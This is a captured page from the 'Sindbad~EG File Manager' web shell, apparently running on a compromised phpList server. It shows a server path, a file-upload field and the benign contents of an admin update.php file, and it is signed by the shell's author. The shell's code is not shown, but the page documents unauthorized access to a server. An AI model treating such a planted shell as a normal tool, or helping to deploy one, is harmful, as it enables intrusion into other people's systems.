Sindbad~EG File Manager

Current Path : /var/www/web3/lists/admin/
Upload File :
Current File : /var/www/web3/lists/admin/update.php

<?php
/**
 * Only superusers can be redirected to updater.
 */
if(isSuperUser() && ALLOW_UPDATER) {
    $_SESSION['phplist_updater_eligible'] = true;
    header('Location: ../updater');
}

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists